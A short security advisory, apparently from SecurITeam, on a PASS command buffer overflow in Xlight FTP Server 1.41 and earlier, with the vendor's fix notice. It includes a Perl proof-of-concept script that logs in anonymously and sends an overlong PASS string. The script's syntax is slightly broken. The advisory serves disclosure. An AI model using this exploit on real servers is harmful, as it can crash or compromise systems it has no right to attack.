‘Xlight FTP Server PASS Buffer Overflow’


Xlight FTP server is ‘a powerful ftp server with very small program size’. A buffer overflow vulnerability in the product has been found allowing remote attackers to overflow an internal buffer.’


‘SecurITeam would like to thank STORM for finding this vulnerability.’


Vulnerable systems:
 * Xlight FTP Server version 1.41 and prior

Immune systems:
 * Xlight FTP Server version 1.45

By sending an overflow long PASS command a local buffer used in Xlight FTP server can be overflowed.

Vendor status:
‘We would like to inform you that we have release a new version of Xlight ftp server 1.45 which includes solution for this buffer overflow problem. Thanks for your alert.

Best regards,
Xlight ftp support

# Exploit for Xlight FTP server long PASS vulnerability
use IO::Socket;
unless (@ARGV == 1) { die ‘usage: $0 host …’ }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => ‘tcp’,
                                 PeerAddr => $host,
                                 PeerPort => ‘ftp(21)’,
unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }


print $remote ‘USER anonymousrn’;

$buf = ‘A’x54; # Min 54, Max 523
print $remote ‘PASS ‘.$buf.’rn’;

close $remote;’

Categories: Windows